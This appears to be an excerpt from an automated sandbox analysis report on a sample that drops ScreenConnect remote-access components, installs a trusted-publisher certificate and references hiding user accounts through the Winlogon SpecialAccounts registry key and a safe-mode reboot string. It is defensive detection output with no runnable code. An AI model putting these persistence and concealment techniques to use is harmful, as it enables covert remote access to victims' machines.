                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EDAA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831129892.00000000012A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EBF8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F0EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1829558136.00000000055E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: khwHsyfsJ1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: khwHsyfsJ1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: khwHsyfsJ1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: khwHsyfsJ1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: khwHsyfsJ1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Detected unpacking (creates a PE file in dynamic memory)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeUnpacked PE file: 11.2.ScreenConnect.ClientService.exe.5530000.0.unpack
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.drStatic PE information: 0xBC0F508C [Tue Dec 24 14:17:48 2069 UTC]
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00B61000
                  Source: khwHsyfsJ1.exeStatic PE information: real checksum: 0x212e6 should be: 0x1eac7
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61BC0 push ecx; ret 0_2_00B61BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887E2D2A5 pushad ; iretd 2_2_00007FF887E2D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F8A318 push eax; retf EB5Ah2_2_00007FF887F8AF2F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F47D00 push eax; retf 2_2_00007FF887F47D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F400BD pushad ; iretd 2_2_00007FF887F400C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F4842E pushad ; ret 2_2_00007FF887F4845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F4845E push eax; ret 2_2_00007FF887F4846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F7E8A8 push E95B7198h; ret 2_2_00007FF887F7E8B9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF88826DA5D push ebx; ret 13_2_00007FF88826DC9A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF88826126D push ebx; iretd 13_2_00007FF88826126E
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF88826DB5A push ebx; ret 13_2_00007FF88826DC9A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF888261381 push edx; iretd 13_2_00007FF888261382
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (41bb451f-21e9-4165-b8b1-29146c1a400a)

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Contains functionality to hide user accounts
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832507878.000000001BD62000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.1829272446.0000000005532000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890524416.0000000002FA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890789904.00000000031A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.Windows.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
